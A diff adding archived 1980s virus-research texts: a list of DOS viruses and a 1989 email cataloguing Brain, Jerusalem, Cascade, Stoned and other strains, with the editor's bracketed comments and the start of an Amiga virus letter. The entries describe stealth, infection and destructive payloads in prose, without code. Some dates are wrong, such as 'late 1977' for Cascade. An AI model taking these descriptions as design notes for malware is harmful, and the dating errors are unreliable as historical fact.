C drive and one COM file on the A drive and infects + them. The virus is extremely fast and the only indication + of infection occurring is the access light on the A drive + (if the current drive is C). The virus will only infect a + file once. + + On every Friday 13 the virus deletes the host program if it + is executed on that day (similar to the Jerusalem). + +19. Friday 13th-B + + This virus is identical to the original except that it + infects every file in the current subdirectory. The only + way this virus can spread beyond the current subdirectory is + if an infected program ends up in the system PATH. Then + every COM file in the currently selected subdirectory will + get infected. + +20. Friday 13th-C + + This is the 13th-B except a message has been added that + displays - "We hope we haven't inconvenienced you" appears + whenever the virus activates. + +21. 
JERUSALEM + (Also called Israeli; Friday the 13th; PLO) + + This virus is a memory resident COM and EXE infector. It + was first discovered at the Hebrew University in Jerusalem + in the fall of 1987. It contains a flaw which makes it re- + infect EXE files over and over until the files become too + big to fit into memory. The virus re-directs interrupt 8 + (among others) and one-half hour after an infected program + loads, the new timer interrupt introduces a delay which + slows down the processor by a factor of about 10. On every + Friday the 13, the virus deletes every program executed + during the day. + +22. JERUSALEM-B + + This virus is identical to the Jerusalem except it is able + to successfully identify pre-existing infections in EXE + files and will only infect them once. + +23. JERUSALEM-C + (Also called the New Jerusalem) + + This virus is identical to Jerusalem-B except that the timer + interrupt delay code has been bypassed. This virus is + virtually invisible until it activates. + +24. BLACK HOLE + (Also called the Russian Virus) + + This virus is the Jerusalem-C that has odd text and + additional code that is never referenced. A new interrupt + eight routine is added to the non referenced area and a + number of interrupt 21 calls which appear meaningless. The + additional text includes - "ANTIVIRUS". It appears that + this virus is a modified version of some previous variety of + the Jerusalem which we have not yet seen. + +25. JERUSALEM-D + + This is the Jerusalem-C that destroys both versions of the + FAT on any Friday the 13th after 1990. The code that + originally deleted executed programs has been overwritten + with the FAT destructive code. + +26. JERUSALEM-E + + This is identical to the D variety except the activation is + any Friday the 13th after 1992. + +27. CENTURY VIRUS + (Also called the Oregon Virus) + + This is similar to the Jerusalem-C except the activation + date is January 1, 2000. 
When the virus activates, it + erases both FATs on all connected drives and then begins + writing zeroes to every sector on every attached device. If + allowed to continue to completion, it displays the message - + " Welcome to the 21st Century". + +28. CENTURY-B + + This virus is similar to the original Century virus with the + following exception: + + It waits for BACKUP.COM to be executed and then garbles all + program writes. After BACKUP terminates, the output + functions return to normal. + +29. 1701 + (Also called Cascade; Falling Tears) + + This virus evolved from a trojan horse disguised as a + utility to automatically turn off the num-lock light at + system boot. The trojan horse caused the characters on the + screen to fall to the bottom of the screen in systems with + CGA monitors. In late 1977 this trojan horse was turned + into a memory resident COM virus. It gets it's name from + the size increase of infected COM files - 1701 bytes. The + virus has some unique qualities: + - It uses an encryption algorithm to avoid detection + and complicate any attempted analysis. + - It contains a sophisticated activation algorithm + that is based on randomizations, machine types, + monitor type, presence or absence of clock cards, + and time of year. + - It was designed to infect only IBM clones. True + IBM systems would be spared. + The virus has a bug that causes the machine selection + algorithm to fail. The virus activates on any machine with + a CGA or VGA monitor, in the months of September, October, + November or December in the year 1980 or 1988 (systems + without clock cards will often have a date set to 1980). + +30. 1701-B + + This virus is identical to the 1701 except that it activates + in the fall of any year. + +31. 1704 + (Also called Cascade; Falling Tears) + + I would prefer to classify this virus as a variety of the + 1701 but it has been universally referred to as a separate + virus, so I will go along with the crowd on this one. 
It is + functionally identical to the 1701 except that the IBM + selection bug has been repaired. The new virus is three + bytes longer. In every other respect it is the same. + +32. 1704-B + + This virus is identical to the 1704, except the cascade + display has been replaced with a system re-boot when the + virus activates. The activation uses the same interrupt 8 + randomization algorithm, so the reboot will occur at a + random time interval after executing an infected program on + or after the activation date. + +33. 1704-C + + This virus is the same as the 1704-B, except the activation + date has been changed to occur in December of any year. + +34. 1704-D + + This virus is the same as the 1704, except the IBM selection + has been disabled (the virus infects true IBM PCs). + +35. LEHIGH + + This is a COMMAND.COM infector that first surfaced at Lehigh + University in late 1987. It is the widest known virus, the + most discussed and the most analyzed of all the viruses, so + I won't waste any more time on it. + +36. SEARCH + (Also called Den Zuk; Venezuelan) + + This is a boot sector infector that infects 360KB 5 1/4" + floppies. It infects through any access to the host + diskette. It can survive a warm reboot. It will infect + data (non-system) diskettes, which in turn can pass on the + infection if an accidental attempt to boot from the data + disk occurs. It has a bug which causes it incorrectly + attempt to infect 3.5" diskettes. This will overwrite the + diskette's FAT and cause a read (or write) failure. It + cannot infect a hard disk, and will not attempt to do so. + If an infected system is rebooted from the hard disk, the + virus will de-activate. This is not the case with rebooting + from a clean floppy - which will become infected. + + The virus causes CGA, EGA and VGA screens to display a + purple "DEN ZUK" graphic to appear after a -- + . It causes no damage. + +37. 
SEARCH-HD + + This virus is identical to the Search Virus, except it's + able to infect hard disks. + +38. SEARCH-B + + This virus is identical to the Search virus, but + unsuccessful modifications have been made to fix the 3.5" + diskette problem. The 3.5" infection still fails, plus + unsuccessful attempts to infect the hard disk will occur + which result in system failure in some systems. + +39. SYS VIRUS + + This virus is really a modification of the Search-HD virus. + The display code has been replaced (no display occurs on + reboot) by code that disables the SYS program. The SYS + program itself is not modified, but any attempt to execute + SYS will result in the program not being loaded. Instead, + multiple reads to the source and target drives will occur + (to simulate the SYS activity). The normal SYS message + output is displayed by the virus at the appropriate time. + This virus will successfully avoid being removed by SYS. + The virus does no damage. + +40. SYS-B + + This is similar to the SYS virus, but it performs a hard + disk format on any Friday 13th after 1990. This virus, and + its precursor virus both still contain the 3.5" bug, so that + they are easily detected on systems using 3.5" drives. They + are difficult to detect on other systems. + +41. SYS-C + + Similar to the SYS virus but performs random reboots + beginning 2 hours after power-on or initial boot. + +42. 648 VIRUS + (Also called the Austrian Virus) + + This is a COM infector that increases the size of the + infected file by 648 bytes. It was first reported in London + in the fall of 1988. It is not a memory resident virus. It + infects the next uninfected COM file in the current + directory (similar to the original Friday 13th). It does no + overt damage. + +43. 648-B + + This is similar to the 648, but it causes infrequent errors + in the infected COM file so that the file will not execute. + Approximately one file in ten will be corrupted. + +44. 
STONED + (Also called New Zealand Virus) + + This is a boot sector infector that infects 360 KB 5 1/4" + floppies. It was first reported in Wellington, New Zealand + in early 1988). It displays - "Your computer is now stoned. + + Legalize Marijuana" every 8th bootup. No overt damage. + Unable to infect hard disk. + +45. STONED-B + + Variation of Stoned. Has been changed to be able to infect + hard disks. The hard disk is infected as soon as an + infected floppy is booted. No intentional damage done, + except systems with RLL controllers will frequently hang. + +46. STONED-C + + This is the Stoned-B virus that no longer displays the + "Stoned" message. This virus is difficult to detect. + +47. VERA CRUZ + (Also Called Bouncing Ball; Italian Virus) + + This is a boot sector virus that was first reported in March + 1988. It is a floppy-only infector. + + When this virus activates (randomly) a bouncing dot appears + on the screen and can only be removed through reboot. No + other damage is done. + +48. VERA CRUZ-B + + This is a variation of the Vera Cruz that is able to infect + Hard disks. + + + + \ No newline at end of file diff --git a/textfiles.com/virus/allvirusdf.vir b/textfiles.com/virus/allvirusdf.vir new file mode 100644 index 00000000..82257cf4 --- /dev/null +++ b/textfiles.com/virus/allvirusdf.vir 
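Review bot: the 1701 entry (item 29) dates the trojan-to-virus conversion to "In late 1977", which conflicts with every other date in this hunk (Lehigh "late 1987", the 1701 activation window "in the year 1980 or 1988", the 648 "fall of 1988") and is presumably a transcription error in the source for 1987; since this file mirrors a textfiles.com document verbatim, confirm it against the upstream copy rather than correcting it here. The same holds for the other visible source defects, "15. ClONE-B" (lowercase L), "Basit & Mjad", "It gets it's name", and the "\ No newline at end of file" marker: a mirror should preserve them byte for byte, so the hunk is fine as long as the bytes match upstream.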
@@ -0,0 +1,732 @@ +From mcvax!cs.hw.ac.uk!davidf@uunet.UU.NET Sun May 7 14:33:38 1989 +Received: from uunet.UU.NET by atanasoff.cs.iastate.edu (3.24.1) id AA15611; Sun, 7 May 89 14:33:16 CDT +Received: from mcvax.UUCP by uunet.uu.net (5.61/1.14) with UUCP + id AA16504; Sun, 7 May 89 15:33:04 -0400 +Received: by mcvax.cwi.nl via EUnet; Sun, 7 May 89 21:22:35 +0200 (MET) +Received: from cs.hw.ac.uk by kestrel.Ukc.AC.UK via Janet (UKC CAMEL FTP) + id aa25450; 7 May 89 20:08 BST +Received: from surya.cs.hw.ac.uk (surya) by brahma.cs.hw.ac.uk; Sun, 7 May 89 20:05:07 BST +From: "David.J.Ferbrache" +Message-Id: <4405.8905071907@surya.cs.hw.ac.uk> +Subject: Virus list (Homebase bulletin board and others) +To: brunnstein@rz.informatik.uni-hamburg.dbp.de, + OJA , + RADAI1 , + luken , + jwright@atanasoff.cs.iastate.edu, well!odawa@uunet.UU.NET +Date: Sun, 7 May 89 20:07:33 BST +Cc: rzotto , + r746ll12 , + chess@cs.heriot-watt.ac.uk, drsolly@ibmpcug.co.uk, + utoday!greenber@uunet.UU.NET +X-Mailer: ELM [version 2.2 PL0] +Status: R + + +Please find enclosed for your information and comment a listing of IBM PC +viruses from Jim Goodwin's Homebase BBS which Jim Wright passed on to me. +I have restructure the original document slightly to place each of his +48 viruses under the original parent virus, so that strains of Brain are +grouped together. I have also added a few comments of my own in brackets. + +Can I strongly suggest we pool our resources so that one comprehensive list +can be produced. It would seem well worth contacting Jim to arrange for +details of 1. the new viruses he describes, and 2. the modifications of +well know viruses which he has observed. + + + + +PC VIRUS LISTING +by Jim Goodwin + +[edited without permission by Dave Ferbrache] + + It is difficult to name, identify and classify PC viruses. +Everyone who first discovers a virus will name it and describe +what they think of it. 
In most cases, the virus is not new and +has been named and described dozens of times before. None of the +names and few of the descriptions will match. While I'm writing +this, for example, I feel certain that someone, somewhere has +just been infected by the Jerusalem virus and they are telling +their co-workers and friends about it as if it were newborn - and +for them perhaps it is. It will be impossible to verify the +strain and variety of the infection, however, unless we can get a +living sample of the virus to analyze and compare with other +strains of this same virus. So problem number one is filtering +the reports of infection and collecting samples that can be +placed under the knife. + + Problem number two is - where do you draw the line between +an original virus and a true variation of the virus. The +original Brain virus, for example, could only infect a floppy +diskette. Do the varieties of the Brain that can infect hard +disks (but in every other respect are identical) deserve to be +called new viruses, or are they still the Brain? What about +further modifications that destroy data? Is this now a new +virus? What if nothing changes but the imbedded text data, so +that the virus is in every way functionally identical, but the +volume label changes to "SMURF" instead of BRAIN. All of these +modifications to the Brain have been discovered and logged. How +do we deal with them? + I choose to deal with these modifications in the simplest +way I know. If the virus differs in any way from the original +(assuming that the "original" can in fact be identified), then I +log it as a new virus. This relieves me from having to make +decisions. Those of you who see the world differently can merely +take this listing and lump together all of the different strains +that you like. That way we'll all be happy. + +[have done Jim, it does seem simpler to me and allows tracing of the + evolution of viruses. 
I personally think an edited text string does + not constitute a new virus, although I agree the line is often hard to + judge] + + This will be, by the way, my last virus document. I have +worked double time for the past eighteen months helping John +McAfee and his Homebase folks and, while I have thouroughly +enjoyed myself, I have finally burned out. It has been great fun +and I've learned a lot, and hopefully some of my works, like the +product review with Sankary and Marsh, will end up being somehow +useful to the world. But now I have the irresistible urge to go +fishing, and, perhaps afterwards, to contemplate my navel for a +few years. In-between times I intend to write a book on the +craziness in this industry and about the unique personalities +I've had the pleasure to work with in the Virus Marine Corps. +It's been quite an adventure. Thank you all. + +Jim Goodwin + + + + + THE VIRUSES + + I have arranged these viruses so that similar varieties are +described in the sequence in which they appeared within the virus +sub-group (to the best of my knowledge). Not everyone agrees +with my groupings. Many people believe, for instance, that the +Golden Gate-C (Mazatlan Virus) is a distinctly original virus and +is not a variation of the Alameda. I think differently and have +endeavored to show how the Golden Gate evolved from the Alameda, +through each precursor virus. I cannot prove, of course, that +the sequence of appearances is the correct sequence, and in many +cases I have had to guess. If you anyone wishes to re-order +these virus, I will not be offended. + I have not included any of the specific application trojans +in this list. There has been a lot of discussion about the Lotus +123 and DBASE "viruses", for example. These are not replicating +programs and I do not classify them as viruses. I had originally +intended a separate list to include these non-replicating trojans +but Time caught up with me. 
+ + + +[BOOT SECTOR AND PARTITION RECORD VIRUSES] +[----------------------------------------] + +[ALAMEDA VIRUS AND VARIANTS] + +(Also called: Yale; Merritt; Pecking; Seoul) + +First discovered at Merritt college in California (1987). +Original version caused no intentional damage. +replicates at boot time -- and infects only +5 1/4" 360KB floppies. It saves the real boot sector at track 39, +sector 8, head 0. Contains a count of the number of times it has +infected other diskettes, although it is referenced for write only and is +not used as part of an activation algorithm. The virus +remains resident at all times after it is booted, even if no +floppy is booted and BASIC is loaded. Contains a rare POP +CS instruction that makes it incapable of infecting 286 +systems. + + ALAMEDA-B (Also called Sacramento Virus) + + This is the original Alameda Virus that has the POP CS + removed. Relocation is accomplished through a long jump + instruction. All other characteristics are identical. This + version runs OK on a 286. + + ALAMEDA-C + + This is the Alameda-B virus that has been modified to + disable the boot function after 100 infections. The + counter in the original Alameda virus has been re-activated + and is interrogated at each bootup. When it reaches 100 the + virus disconnects from the original boot sector (control is + no longer passed) and the diskette will no longer boot. At + infection time, the counter is zeroed on the host diskette. + + SF VIRUS + + This is the Alameda-C that has been modified to format the + boot diskette when the counter runs out. + + GOLDEN GATE VIRUS (Also called The 500 Virus) + + This is the SF Virus that has been modified to format the C + drive when the counter runs out. The activation occurs + after 500 infections, instead of 100 infections. Note that + in all three of these strains, the counter is zeroed on the + host diskette at infection time. 
Thus, the activation + period on this virus will on the average stretch into many + years. No corruption will occur until 500 new diskettes + have been infected from within a given machine. Since the + infection can only occur when the system is booted with a + new diskette, infection is not frequent with this virus. I + expect that the overwhelming majority of infections will + never activate. The IBM PC will have long since been + supplanted by another architecture in most environments. + + GOLDEN GATE-B + + This virus is the Golden Gate virus that has had the + activation delay reset to 30 infections. This virus should + activate within a couple of years in most environments. + + GOLDEN GATE-C (Also called the Mazatlan Virus) + + This virus is the Golden Gate virus that is able to infect a + hard disk. It is a nasty virus, since it has more of an + opportunity to do damage than previous versions. Prior + versions were limited since systems with hard disks are only + infrequently booted from floppy and booting from hard disk + overwrote earlier versions. + + GOLDEN GATE-D + + This virus is identical to number 7, except the counter has + been disabled (similar to original Alameda). + +[BRAIN VIRUS AND VARIANTS] + +(Also called, Pakistani Brain; Basit Virus) + +This virus originated in January, 1986, in Lahore Pakistan. +It is the only virus yet discovered that includes the valid +names address and phone numbers of the original +perpetrators. The Brain is a boot sector infector, +approximately 3K in length, that infects 5 1/4" floppies. +It cannot infect hard disks. It will infect a diskette +whenever the diskette is referenced. For example, a +Directory command, executing a program from the diskette, +copying a file from or to the diskette or any other access +will cause the infection to occur. The virus stores the +original boot sector, and six extension sectors, containing +the main body of the virus, in available sectors which are +then flagged as bad sectors. 
+ +The virus is able to hide from detection by intercepting any +interrupt that might interrogate the boot sector and re- +directing the read to the original boot sector. Thus, +programs like the Norton Utilities will be unable to see the +virus. + +Infected diskettes are noticeable by "@BRAIN" displayed in +the volume label. + + BRAIN-B (Also called Brain-HD; the Hard Disk Brain; Houston Virus) + + This virus is identical in every respect to the original + Brain, with the single exception that it can infect the C + drive. + + BRAIN-C + + This virus is the Brain-B that has the volume label code + removed. The volume label of infected diskettes does not + change with this virus. This virus was difficult to detect + since it does nothing overt in the system. + + CLONE VIRUS + + This virus is the Brain-C that saves the original boot + copyright label and restores it to the infected boot. The + Basit & [A]mjad original Brain messages have been replaced with + non-printable garbage that looks like instructions if viewed + through Norton or other utility. Even if the system is + booted from a clean diskette, it is virtually impossible to + tell, by visual inspection, whether the hard disk is + infected. + + SHOE_VIRUS (Also called UIUC Virus) + + This virus is the Brain-B Virus that has been modified to + include the message - "VIRUS_SHOE RECORD, v9.0. Dedicated + to the dynamic memories of millions of virus who are no + longer with us today". The message is never displayed. + + [I would also tentively identify this with the ashar virus as we + have a VIRUS_SHOES RECORD v9.0 with the identifying string ashar at + offset 04a6hex] + + + SHOE_VIRUS-B + + This is the Shoe_Virus that has been modified to so that it + can no longer infect hard disks. The v9.0 has been changed to + v9.1. 
+ + [Have to question this we have a version of Brain with VIRUS_SHOE + RECORD v9.0 which is incapable of activating a virus stored on hard + disk due to the drive number being hardwired into the read routine + for loading the virus. I suspect v9.1 may be the hard disk variant.] + + ClONE-B + + This is the Clone virus that has been modified to corrupt + the FAT when it is booted after May 5, 1992. There are no + other apparent modifications. + + [JORK VIRUS] + + [This virus is the Shoe virus with the identifying text at + offset 0010hex reduced to "Welcome to the Dungeon (c) 1986 Brain", with + the text at 0202hex reading "(c) 1986 Jork & Amjads (pvt) Ltd".] + + [TERSE SHOE VIRUS] + + [A variant of Shoe virus with the initial text message truncated to + a single line] + +[ITALIAN VIRUS AND VARIANTS] + +(Also Called Bouncing Ball; Vera cruz) + +This is a boot sector virus that was first reported in March +1988. It is a floppy-only infector. + +When this virus activates (randomly) a bouncing dot appears +on the screen and can only be removed through reboot. No +other damage is done. + + ITALIAN-B + + This is a variation of Italian that is able to infect + Hard disks. + + [Obviously they have been spared this virus which I find suprising, this + does not seem to be based on first hand evidence] + + +[NEW ZEALAND AND VARIANTS] + +(Also called Stoned Virus) + +This is a boot sector infector that infects 360 KB 5 1/4" +floppies. It was first reported in Wellington, New Zealand +in early 1988). It displays - "Your computer is now stoned. +Legalize Marijuana" every 8th bootup. No overt damage. +Unable to infect hard disk. + + NEW ZEALAND-B + + Variation of New Zealand. Has been changed to be able to infect + hard disks. The hard disk is infected as soon as an + infected floppy is booted. No intentional damage done, + except systems with RLL controllers will frequently hang. + + NEW ZEALAND-C + + This is the Stoned-B virus that no longer displays the + "Stoned" message. 
This virus is difficult to detect. + + +[SEARCH AND VARIANTS] + +(Also called Den Zuk; Venezuelan) + +This is a boot sector infector that infects 360KB 5 1/4" +floppies. It infects through any access to the host +diskette. It can survive a warm reboot. It will infect +data (non-system) diskettes, which in turn can pass on the +infection if an accidental attempt to boot from the data +disk occurs. It has a bug which causes it incorrectly +attempt to infect 3.5" diskettes. This will overwrite the +diskette's FAT and cause a read (or write) failure. It +cannot infect a hard disk, and will not attempt to do so. +If an infected system is rebooted from the hard disk, the +virus will de-activate. This is not the case with rebooting +from a clean floppy - which will become infected. + +The virus causes CGA, EGA and VGA screens to display a +purple "DEN ZUK" graphic to appear after a -- +. It causes no damage. + + SEARCH-HD + + This virus is identical to the Search Virus, except it's + able to infect hard disks. + + SEARCH-B + + This virus is identical to the Search virus, but + unsuccessful modifications have been made to fix the 3.5" + diskette problem. The 3.5" infection still fails, plus + unsuccessful attempts to infect the hard disk will occur + which result in system failure in some systems. + + SYS VIRUS + + This virus is really a modification of the Search-HD virus. + The display code has been replaced (no display occurs on + reboot) by code that disables the SYS program. The SYS + program itself is not modified, but any attempt to execute + SYS will result in the program not being loaded. Instead, + multiple reads to the source and target drives will occur + (to simulate the SYS activity). The normal SYS message + output is displayed by the virus at the appropriate time. + This virus will successfully avoid being removed by SYS. + The virus does no damage. 
+ + SYS-B + + This is similar to the SYS virus, but it performs a hard + disk format on any Friday 13th after 1990. This virus, and + its precursor virus both still contain the 3.5" bug, so that + they are easily detected on systems using 3.5" drives. They + are difficult to detect on other systems. + + SYS-C + + Similar to the SYS virus but performs random reboots + beginning 2 hours after power-on or initial boot. + +[COMMAND.COM VIRUSES] +[-------------------] + +LEHIGH + +This is a COMMAND.COM infector that first surfaced at Lehigh +University in late 1987. It is the widest known virus, the +most discussed and the most analyzed of all the viruses, so +I won't waste any more time on it. + +[A pity since there is now a further variant] + + [LEHIGH-2] + + [A version of the Lehigh virus modified to retain its infection + counter in RAM, and to only trigger the destructive phase when the + counter reaches 10 infections the disk FAT table is nulled] + +[TRANSIENT OBJECT FILE VIRUSES] +[-----------------------------] + +[DOS-62 AND VARIANTS] + +(Also called the UNESCO Virus) + +This virus is a COM infector. It was first discovered in +Moscow in April, 1988. It was first publicized in August +1988 when it cropped up at a children's computer Summer camp +run by UNESCO. When a program infected by this virus is +executed, it infects one other COM file in the system. On a +random basis, infected programs will perform a system re- +boot when they are executed. + + 62-B + + This virus is similar to DOS-62 except the re-boot is + replaced by deleting the executed program. + +[FRIDAY THE 13th] + +[Here lies a problem, this virus is totally different from the Israeli + Friday 13th strain, for one thing it is transient in that it does not + hook interrupts and remain active in memory] + +(Also called COM Virus; 512 virus) + +This virus is a non-resident COM infector that first +appeared in South Africa in 1987. 
At each execution of an +infected program the virus seeks out two other COM files on +the C drive and one COM file on the A drive and infects +them. The virus is extremely fast and the only indication +of infection occurring is the access light on the A drive +(if the current drive is C). The virus will only infect a +file once. + +On every Friday 13 the virus deletes the host program if it +is executed on that day (similar to the Jerusalem). + + Friday 13th-B + + This virus is identical to the original except that it + infects every file in the current subdirectory. The only + way this virus can spread beyond the current subdirectory is + if an infected program ends up in the system PATH. Then + every COM file in the currently selected subdirectory will + get infected. + + Friday 13th-C + + This is the 13th-B except a message has been added that + displays - "We hope we haven't inconvenienced you" appears + whenever the virus activates. + + +[AUSTRIAN VIRUS AND VARIANTS] + +(Also called the 648 Virus) + +This is a COM infector that increases the size of the +infected file by 648 bytes. It was first reported in London +in the fall of 1988. It is not a memory resident virus. It +infects the next uninfected COM file in the current +directory (similar to the original Friday 13th). It does no +overt damage. + + AUSTRIAN-B + + This is similar to the original, but it causes infrequent errors + in the infected COM file so that the file will not execute. + Approximately one file in ten will be corrupted. + + +[405 VIRUS] + +[A .COM infecting overwritting virus, similar to the Virus 1.1 published + in Ralf Burger's book. Infected files are destroyed and replaced by the + 405 byte long virus code.] + +[RESIDENT OBJECT FILE VIRUSES] +[----------------------------] + +[JERUSALEM VIRUS AND VARIANTS] + +(Also called Israeli; Friday the 13th; PLO) + +This virus is a memory resident COM and EXE infector. 
It +was first discovered at the Hebrew University in Jerusalem +in the fall of 1987. It contains a flaw which makes it re- +infect EXE files over and over until the files become too +big to fit into memory. The virus re-directs interrupt 8 +(among others) and one-half hour after an infected program +loads, the new timer interrupt introduces a delay which +slows down the processor by a factor of about 10. On every +Friday the 13, the virus deletes every program executed +during the day. + +[The sUMsDos variant I assume] + + JERUSALEM-B + + This virus is identical to the Jerusalem except it is able + to successfully identify pre-existing infections in EXE + files and will only infect them once. + + JERUSALEM-C + (Also called the New Jerusalem) + + This virus is identical to Jerusalem-B except that the timer + interrupt delay code has been bypassed. This virus is + virtually invisible until it activates. + + BLACK HOLE + (Also called the Russian Virus) + + This virus is the Jerusalem-C that has odd text and + additional code that is never referenced. A new interrupt + eight routine is added to the non referenced area and a + number of interrupt 21 calls which appear meaningless. The + additional text includes - "ANTIVIRUS". It appears that + this virus is a modified version of some previous variety of + the Jerusalem which we have not yet seen. + + JERUSALEM-D + + This is the Jerusalem-C that destroys both versions of the + FAT on any Friday the 13th after 1990. The code that + originally deleted executed programs has been overwritten + with the FAT destructive code. + + JERUSALEM-E + + This is identical to the D variety except the activation is + any Friday the 13th after 1992. + + CENTURY VIRUS (Also called the Oregon Virus) + + This is similar to the Jerusalem-C except the activation + date is January 1, 2000. When the virus activates, it + erases both FATs on all connected drives and then begins + writing zeroes to every sector on every attached device. 
If + allowed to continue to completion, it displays the message - + " Welcome to the 21st Century". + + CENTURY-B + + This virus is similar to the original Century virus with the + following exception: + + It waits for BACKUP.COM to be executed and then garbles all + program writes. After BACKUP terminates, the output + functions return to normal. + +[No mention of the sURIV 3.00 variant here] +[Nor any of the April 1st sURIV 1.01 and sURIV 2.01 viruses] + +[APRIL 1ST AND VARIANTS] + +[A memory resident .COM infecting virus which displays the message + "APRIL 1ST HA HA HA YOU HAVE A VIRUS" on April 1st after memory is infected by + execution of an infected .COM file and a further .COM file is executed. + + The system locks up requiring a reboot. This virus has the identifying text + string sURIV 1.01. + + APRIL 1st-B + + A .EXE infecting version of .COM which will display the characteristic + message on execution of any infected .EXE file on April 1st, with + associated lockup. A similar lockup will occur 1 hour after infection + of memory on any day on which the default date 1-1-80 is used.] + +[CASCADE VIRUS AND VARIANTS] + +(Also called 1701; Falling Tears; [Autumn Leaves]) + +This virus evolved from a trojan horse disguised as a +utility to automatically turn off the num-lock light at +system boot. The trojan horse caused the characters on the +screen to fall to the bottom of the screen in systems with +CGA monitors. In late 1977 this trojan horse was turned +into a memory resident COM virus. It gets it's name from +the size increase of infected COM files - 1701 bytes. The +virus has some unique qualities: + - It uses an encryption algorithm to avoid detection + and complicate any attempted analysis. + - It contains a sophisticated activation algorithm + that is based on randomizations, machine types, + monitor type, presence or absence of clock cards, + and time of year. + - It was designed to infect only IBM clones. True + IBM systems would be spared. 
+The virus has a bug that causes the machine selection +algorithm to fail. The virus activates on any machine with +a CGA or VGA monitor, in the months of September, October, +November or December in the year 1980 or 1988 (systems +without clock cards will often have a date set to 1980). + + CASCADE-B + + This virus is identical to the cascade except that it activates + in the fall of any year. + + 1704 [(Also called Blackjack)] + + I would prefer to classify this virus as a variety of the + 1701 but it has been universally referred to as a separate + virus, so I will go along with the crowd on this one. It is + + [Nope I have compared the code, identical except for a single instruction, + in my book that counts as the same virus] + + functionally identical to the 1701 except that the IBM + selection bug has been repaired. The new virus is three + bytes longer. In every other respect it is the same. + + 1704-B + + This virus is identical to the 1704, except the cascade + display has been replaced with a system re-boot when the + virus activates. The activation uses the same interrupt 8 + randomization algorithm, so the reboot will occur at a + random time interval after executing an infected program on + or after the activation date. + + 1704-C + + This virus is the same as the 1704-B, except the activation + date has been changed to occur in December of any year. + + 1704-D + + This virus is the same as the 1704, except the IBM selection + has been disabled (the virus infects true IBM PCs). + +[No mention either of the Dbase virus Ross reported recently, of the Oropax + reported by Klaus Brunnstein, so] + +[DBASE VIRUS] + +A memory resident .COM/.EXE virus. When an infected application is executed +the virus will install in memory looking for an open operation on .DBF files, +any writes would thereafter have two bytes transposed at random, their +location being recorded in the file BUG.DAT in the .DBF directory. 
Reads of +data would be corrected by the resident portion of the virus, thus data +appeared correct. After 90 days the virus would null the root directory and +FAT structures. + +[OROPAX VIRUS] + +(alias music virus) + +A memory resident .COM infecting virus. When an infected application is +executed the virus installs in memory trapping the DOS 21h interrupt. Thereafter +when a program attempts a create subdirectory, remove subdirectory, create +file, open file, delete file, get/set file attributes, rename file, delete file +(FCB), create file (FCB) or rename file (FCB) call one .COM file is infected +in the home directory. Command.com, com files with length divisible by 51, +com files with attribute other than normal or archive or com files with +length > 61980 bytes will not be infected. If based on a random number +the virus activates it will play 3 melodies repeatedly with a 7 minute +interval. + +[In addition I have reports of a further transient object file virus] +[ + In general the virus list seems very comprehensive listing as it does a + large number of variants of the more common viruses. It does seem to omit + detail on the Italian and Lehigh viruses in particular which any list + seeking to be comprehensive must include. I suggest that it would be + very useful to contact the author and arrange for a pooling of resources. + + We now have 5 separate lists of IBM viruses in preparation. Klaus' + catalog is very detailed (from the sample entries I have examined) although + I doubt if it can achieve the coverage that Jim Goodwin's list has. As + always it comes down to arranging that we receive, disassemble and + detail new virus strains when they are discovered. Having a number of + centres world wide seems an unnecessary duplication of effort, made even + worse by the lack of sharing of information which occurs. 
We need a + standard format for virus reports, a list of contacts and the free + interchange of information between each of the existing sites (this should + include virus samples, disassemblies and analysis). + + Comp.virus can (I think) prove useful as a contact point through which we + can track new infections, although this will be supplanted by the + establishment of national centres with a reputation (and/or government + recognition) for work in this field. + + I am still collating information for an exhaustive catalog, although + indications are that with the explosion of the virus problem this is now + becoming a full time job. Co-operation is important. I entered the field + four months ago, and in that time I have seen how important the establishment + of these links is. Within the UK there are a number of isolated workers + in the virus field, this must change. + + Within the Mac field there is a mailing list (Macmash) where discussion + and technical analysis of new strains takes place. I stand by my original + view that there is a place for such a list for IBM PC systems in addition + to virus-l. Many of the viruses described above have never come to light + in reports on virus-l, this should also change. There have been a number + of excellent virus reports on virus-l which have provided very useful + symptomatic analyses of viruses, without providing too much technical + detail. + + Anyway, enough of the soapbox. Any comments on the above list, including + additions, omissions and corrections would be appreciated. The list seems + extensive, but lacks the detailed information required (for me at least) + to prepare user information and detection software for the above viruses. 
+] + +------------------------------------------------------------------------------ +Dave Ferbrache Internet +Dept of computer science Janet +Heriot-Watt University UUCP ..!mcvax!hwcs!davidf +79 Grassmarket Telephone +44 31-225-6465 ext 553 +Edinburgh, United Kingdom Facsimile +44 31-220-4277 +EH1 2HJ BIX/CIX dferbrache +------------------------------------------------------------------------------ + diff --git a/textfiles.com/virus/amigvir1.txt b/textfiles.com/virus/amigvir1.txt new file mode 100644 index 00000000..c7a80206 --- /dev/null +++ b/textfiles.com/virus/amigvir1.txt 
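Review bot: the Cascade paragraph dates the conversion of the num-lock trojan into a virus to "late 1977", which contradicts the rest of the same hunk (activation years of 1980 or 1988, and the 1701/1704 entries' 1988 timeline), so the commit message or an archive README should flag that line as a typo in the source rather than leaving readers to take it as fact; since this is a verbatim archive copy the text itself should stay as committed. The hunk also interleaves the original list with the archiver's own bracketed interjections ("[Nope I have compared the code ...]", "[No mention of the sURIV 3.00 variant here]") without any marker explaining that two voices are present, so a one-line note in the commit message saying that bracketed text is Dave Ferbrache's commentary on Jim Goodwin's list would help anyone using this file as a reference.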
@@ -0,0 +1,72 @@ +I just return from a trip to Australia, and while looking through some of +the local computer magazines I spotted an interesting article in MEGACOMP, +an Aussie mag for the Amiga. The following is a letter submitted by "The +Fallen Angel". + + As a member of the POISON (Australian) Cracking Association, I would like +to comment on how well you have covered the subjectof viruses on the Amiga. + + Every comment you have made on each virus is 100% correct. But I would +like to point out htat after you said it might have been the MOVERS who made +the Byte Bandit Virus, I got in contact with them, and the MOVERS did not +make the Byte Bandit Virus. + + This got me asking around other Crackers to find out who had been +responsible, and eventually I found out who made it: it was the SCA again! + + They made the Byte Bandit Virus as a follow up to the SCA Virus, because +after they came out with the SCA, other cracking and hacking associations +said that they (SCA) only had the know how to make a harmless virus. Man, +did they prove EVERYONE Wrong! + + With the Byte Bandit, the SCA had now made the most damaging virus known +to AMIGA users throughout the world! + + They also said that there was no need now for them to make any more +viruses, as they had proved their point. They have invented Virus Killers +to make up for creating the viruses. + + If you don't have a Virus Killer, you can still test your disks for the +SCA virus by holding donw the left mouse button when you boot up your disks. + If you have a virus, your color screen will show a flash of GREEN for a +short time, until it gets to the DOS screen. + + I am not sure if this works with the Byte Bandit virus, as when I 